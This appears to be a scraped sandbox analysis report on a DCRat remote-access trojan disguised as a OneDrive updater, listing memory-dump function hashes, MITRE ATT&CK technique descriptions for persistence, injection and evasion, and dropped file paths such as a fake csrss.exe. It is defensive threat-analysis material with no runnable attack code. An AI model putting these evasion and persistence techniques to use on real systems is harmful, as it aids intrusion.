Instruction Fuzzy Hash: 3111B471A5D7868FF756DF3884542357BE5FF16301F0441BAE08DC71A2EE25D8458781

Function 00007FFAAC5DCE1D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59485b3234cdca9141ce73deb511fe723bd62995745fb2dc4b499689495ae450
Instruction ID: 06c9355b0161fbb4c6045fb57d3f0901ebc09256d14f254dec08e617bca6e38e
Opcode Fuzzy Hash: 59485b3234cdca9141ce73deb511fe723bd62995745fb2dc4b499689495ae450
Instruction Fuzzy Hash: 3B014C61A5D78B4BF757C72C5011274BBD1DB97211B1445BBD08DC21C6CD14B80583C0

Function 00007FFAAC46CAA8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1eca32c6cddead0df7432ca5e7b1ccd0bd5c401e06ae0fb4e78039438ce1b46
Instruction ID: 6d8b45b475a68611cb2907a82dd8c3cdfea0babf9fc9aa40e461c07c4536b829
Opcode Fuzzy Hash: c1eca32c6cddead0df7432ca5e7b1ccd0bd5c401e06ae0fb4e78039438ce1b46
Instruction Fuzzy Hash: 4901282270DF454FF361D7BC68592B5BBE0EB85165B08467BD48EC258ADD18E88983C4

Function 00007FFAAC5DC005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0960d9a704a11cebda021bc16833a27fd1eedbfc788d3bedee2c5f3158bb5abf
Instruction ID: 5a6126f151330b055f5baae516cecdabd7f92f997cc5a6732568ef760b659e3c
Opcode Fuzzy Hash: 0960d9a704a11cebda021bc16833a27fd1eedbfc788d3bedee2c5f3158bb5abf
Instruction Fuzzy Hash: 0311061055E3C64FE70B973898554B47FA0EF47304B5880FBE49ACA197D81DA89EC391

Function 00007FFAAC5D1A8E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957795ab355f2cc44e20fba0f00616309680b51f58c5421260bf439d9eaa8674
Instruction ID: beb1e96632bf02013e2c217f19c6ef2c3b6233e2231a477859ec5243762787f2
Opcode Fuzzy Hash: 957795ab355f2cc44e20fba0f00616309680b51f58c5421260bf439d9eaa8674
Instruction Fuzzy Hash: 2D111731E5990A8FEB99DB58C455ABD77B1EB59311F4041BAA00EE3291CE34A9808B80

Function 00007FFAAC5D8151 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f92d3716e2ee9d6d401972c9b9b4d6b8dfdc69d9799c9e05acde79b3259037c0
Instruction ID: a342bb8ccab2457578075e7137d24ba97a196012187395540cd6648400d7ad6f
Opcode Fuzzy Hash: f92d3716e2ee9d6d401972c9b9b4d6b8dfdc69d9799c9e05acde79b3259037c0
Instruction Fuzzy Hash: AF113D21A9EB07CBF26EDB58544123972E9FF46300B20883EE5DF83682D928F90D56C1

Function 00007FFAAC5D7909 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569a7d37ffe87ad42bb715bbcd424301b632ae7c5c3aedad6b0bc2a141b4ab67
Instruction ID: 69670b6ce3c31ca7f724abfa06ef9e4db29778bf6ad3cf01a10ff0aefd5abe4f
Opcode Fuzzy Hash: 569a7d37ffe87ad42bb715bbcd424301b632ae7c5c3aedad6b0bc2a141b4ab67
Instruction Fuzzy Hash: D501F22290F38ADFFB22C7A448556E63BA8EB43380F0445B7E04CC7186D9689909C7E1

Function 00007FFAAC4CEE33 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323999ec918a47d8074e45c5a4fc14dd4d61d20d53f15d91f6b5b4a87c8e152f
Instruction ID: 424e3b4e8f621a23dccab368f2bd0226130568a7c405d2afcbac645446bb6e07
Opcode Fuzzy Hash: 323999ec918a47d8074e45c5a4fc14dd4d61d20d53f15d91f6b5b4a87c8e152f
Instruction Fuzzy Hash: 15F01D31B2DD098BA754EA5CD495678B3A1EF497147108279D01ED3686CE24FC0687C5

Function 00007FFAAC5D1D62 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e36eee72224f21fc9d873a51d823ce70bad33a10e8466bf95854ed510ca4b53
Instruction ID: 903db080cdeb744955af87343c8878a96ef77265703f0c9d78ba592d818fe3a2
Opcode Fuzzy Hash: 6e36eee72224f21fc9d873a51d823ce70bad33a10e8466bf95854ed510ca4b53
Instruction Fuzzy Hash: 5BF0443188E3C6DFE717DB7088565E63FA8AF43214B1840E7E449860A2C668965AC791

Function 00007FFAAC4CFA00 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9311edd76e05a22083ebba45e0d5f93c43786d11c59e26974186628a327e777e
Instruction ID: 171a77417190e32bb84b00a42590a1c395497b311c0bfc8a2b43a8e0f4689ce2
Opcode Fuzzy Hash: 9311edd76e05a22083ebba45e0d5f93c43786d11c59e26974186628a327e777e
Instruction Fuzzy Hash: 11F0312091DA1A8BE695EB25C05597673E1FF55304B408538984FC35F3DD2CF8498784

Function 00007FFAAC4CE082 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b6abfe572400be8478710f7b182e1d26fe7793e6af1d7ddac146c151d2c6fa
Instruction ID: 51f59136ff372818511ad1bc7bd7bc5813bf2372f7cd85c7a63203362e9e8402
Opcode Fuzzy Hash: 89b6abfe572400be8478710f7b182e1d26fe7793e6af1d7ddac146c151d2c6fa
Instruction Fuzzy Hash: 9BF0623185F2C5DFE3139B7088555E97FB4EF43214F1840FAD499870B2CA2D660AC7A2

Function 00007FFAAC4CB96D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567224a5c1e5d62743303b0df47a424208c45b2e1cf3523e0228358202edffdc
Instruction ID: 8e102c23a5dcbf47d876ac0d611bbe267f98520506036bb1cfec0ebcca497e20
Opcode Fuzzy Hash: 567224a5c1e5d62743303b0df47a424208c45b2e1cf3523e0228358202edffdc
Instruction Fuzzy Hash: 55F0C27180D6899FE70AD76888690AC7FB0EF16200F4480EBD44ACB0A3DD2455598781

Function 00007FFAAC5D36E0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe4d210753517a5c43ee42a544c1f60e733e655d837bdcddcf322fe29fa6b50
Instruction ID: 6e030cc0dce64facfdcce40cca1fd0db6a6e2f8751a4732a36f953862d4cc759
Opcode Fuzzy Hash: abe4d210753517a5c43ee42a544c1f60e733e655d837bdcddcf322fe29fa6b50
Instruction Fuzzy Hash: 5CF0AF20A59E0A8BE6A5EB28C058A7673E1FF55300B808539D44FC31E2DE28F84987C0

Function 00007FFAAC5D8610 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274881f2d350f847de8bc195d02a84c77dc1be2b1c21a5b55429c673a1e3ef32
Instruction ID: 6c97bf5cb76e3b372ee253a2030dadbacab0a814c2238d4da264c1bf1573b062
Opcode Fuzzy Hash: 274881f2d350f847de8bc195d02a84c77dc1be2b1c21a5b55429c673a1e3ef32
Instruction Fuzzy Hash: 09F0312095DA168BE799EB25C054A7672E1FF55304B508539944FC35E2DE28F44D87C4

Function 00007FFAAC5D6C72 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7792b3020903f51c6bdde2a4cb34f3c425a38fba7c009a6d96176061b861837
Instruction ID: 9641cff9b88a85b41ef8add61deadfacfac12707b293e4bbd2e789fa0409d7bf
Opcode Fuzzy Hash: b7792b3020903f51c6bdde2a4cb34f3c425a38fba7c009a6d96176061b861837
Instruction Fuzzy Hash: 22F0A43548E386DFE712CB7098515993FA4EF53204B0840FAE45986062C92D650AC7A1

Function 00007FFAAC4CF87E Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea028296230a4f3072ebe61e5c4130b771057e447400a9766c0c7ab38bd1532
Instruction ID: f5193744d124f946f09da888221d4e8e2529dd73edbfbae4cb2406a928dbeabf
Opcode Fuzzy Hash: 1ea028296230a4f3072ebe61e5c4130b771057e447400a9766c0c7ab38bd1532
Instruction Fuzzy Hash: 87F05E302095068BF759DB18C4687A173D1FB9A308F544579D91EC76E1EA69E9848B80

Function 00007FFAAC5D355E Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d045a14e1824370b22f48b87fcd45fea8359173f1ffaee7044fa4ce99a7b3d08
Instruction ID: a710f29a72c73059a93400660308909cbbcd5e847d7d77a29281288a5c0bc35e
Opcode Fuzzy Hash: d045a14e1824370b22f48b87fcd45fea8359173f1ffaee7044fa4ce99a7b3d08
Instruction Fuzzy Hash: 1FF05E31245A078BF359DB1CC0647A233E5FB96300F10416EE91EC77D1EA69E984CB80

Function 00007FFAAC5D848E Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73cc032e95e3e0ee923d71a0e28ecb3f3d620768232142530956eb374e096f7
Instruction ID: dc9bc59d95f3be62c43e18aa21b54da0f904a36c664d2db81ce7bd5423c52497
Opcode Fuzzy Hash: c73cc032e95e3e0ee923d71a0e28ecb3f3d620768232142530956eb374e096f7
Instruction Fuzzy Hash: D5F05E302456078BF359DB18C0647A133D5FBA6309F14456AE91EC77D2DE6AE984CBC0

Function 00007FFAAC5D85FC Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32309aa06f84411a19d28b99264bef84673cca3172a6b3dc8b1221026678dd4c
Instruction ID: 52483cd9025516e0f39c5185915000c8a52b8d9f95a3fb6b1b6c1e54038ce3e2
Opcode Fuzzy Hash: 32309aa06f84411a19d28b99264bef84673cca3172a6b3dc8b1221026678dd4c
Instruction Fuzzy Hash: 93E09B3599E562CBF715AB26800877973D5EF63351B4400BBE48D8A1D2CE2D900AD680

Function 00007FFAAC5D8468 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcb874d9a89e21240aa23d72994f0089b046c6942091e186f03cb72a898fddbf
Instruction ID: ab2f7295a80d5d85514b0b3857377ce62b0c2eba7b3f17b6e9d4afb746afb704
Opcode Fuzzy Hash: bcb874d9a89e21240aa23d72994f0089b046c6942091e186f03cb72a898fddbf
Instruction Fuzzy Hash: C8E04F4099FB07CAF26FD710441137916D8AF13345F25803BE44F825D2DC19E40992C2

Function 00007FFAAC4CF85B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f897eb52f7a9c8a49cf8bc8dd4438b0dbe988f3febbaafee1b9126f072bf2a
Instruction ID: d8ba40531541eea4dd3e90730439aa36294ef2175d145f2ef69cd875e02fad0f
Opcode Fuzzy Hash: 05f897eb52f7a9c8a49cf8bc8dd4438b0dbe988f3febbaafee1b9126f072bf2a
Instruction Fuzzy Hash: BAD0C910A0FA03C7F13B474680A833961A08F0770CEA0C53EE49F418E1CE1DF40A6399

Function 00007FFAAC5D353B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b8f87939aff5b32161169c3911dd2c39f223b3e9ee56dde44a24e6da00aceb1
Instruction ID: 7ed82adf3bc8fdf889234a264c5e8663524a22efcd0ea173c6ba2ceef8693367
Opcode Fuzzy Hash: 8b8f87939aff5b32161169c3911dd2c39f223b3e9ee56dde44a24e6da00aceb1
Instruction Fuzzy Hash: 7BD09254A9FB43C6F16FCB0DC16033A52B95F03701E64C03BE05F418D2C91DF9096281

Function 00007FFAAC5D2A70 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffce36f2ae7a39bfb72ffcfd2d252a8cf6303dae0d626612b48019422640223d
Instruction ID: 04c0cf01abc73f54993eff2c92a344d9b5d92dc8742829237da7a40ed1695d9f
Opcode Fuzzy Hash: ffce36f2ae7a39bfb72ffcfd2d252a8cf6303dae0d626612b48019422640223d
Instruction Fuzzy Hash: C8B09200B4A703E6B97141B81C88138024A8B8B2B0B218736F63B861E2EA986C0911A1

Function 00007FFAAC4CED91 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1daa667352cc766098f1c156f50abcc2679a76ee8d1e042f2fd5c8eebf710fc7
Instruction ID: 050c28f5570bf3f1c17bfa6910ee94d2cab8b1c38da87939348b585beb48941c
Opcode Fuzzy Hash: 1daa667352cc766098f1c156f50abcc2679a76ee8d1e042f2fd5c8eebf710fc7
Instruction Fuzzy Hash: 1BB09200E0E203D7F22202A0044C0BC01410B4724DAA08D30AA2E461E2DD48A84822E8

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OneDriveStandaloneUpdater.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe

C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe:Zone.Identifier

C:\Program Files\Microsoft Office 15\ClientX64\ef091392c4842d

C:\Program Files\Windows Mail\MjlsqDcSPlv.exe

C:\Program Files\Windows Mail\MjlsqDcSPlv.exe:Zone.Identifier

C:\Program Files\Windows Mail\ef091392c4842d

C:\Users\Public\Documents\886983d96e3d3e

C:\Users\Public\Documents\csrss.exe

C:\Users\Public\Documents\csrss.exe:Zone.Identifier

C:\Users\Public\MjlsqDcSPlv.exe

